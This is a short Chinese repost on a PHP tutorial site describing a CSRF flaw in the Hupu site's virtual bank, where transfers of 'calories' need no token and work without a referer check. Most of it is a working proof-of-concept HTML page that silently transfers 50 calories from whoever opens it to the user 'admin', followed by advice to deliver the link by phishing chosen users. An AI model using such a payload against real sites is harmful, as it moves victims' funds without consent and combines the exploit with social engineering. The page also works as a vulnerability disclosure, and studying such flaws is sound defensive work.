来源:自学PHP网 时间:2015-04-17 10:16 作者: 阅读:次
[导读] 虎扑有个银行功能, 存款单位为卡路里这次试了一下抓包看到过程没有token, refer去掉后也依旧转帐成功, 证明存在CSRF可能性1 利用xss js中的代码,在服务器上建立一个html页面html script sr...
|
虎扑有个银行功能, 存款单位为卡路里
这次试了一下
 抓包看到过程
 没有token, refer去掉后也依旧转帐成功, 证明存在CSRF可能性
1. 利用xss.js中的代码,在服务器上建立一个html页面
<html>
<script src="xss.js"></script>
<script>
xss.csrf(url="http://my.hupu.com/bank_act.php", {"action": "virement", "pwuser": "admin", "to_money": "50", "content_plus": "csrf"});
</script>
</html>
2. 用户点击后就会自动给admin用户转帐50卡路里
3. 利用方面主要依赖钓鱼技巧,给特定用户发链接钓其中招
 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
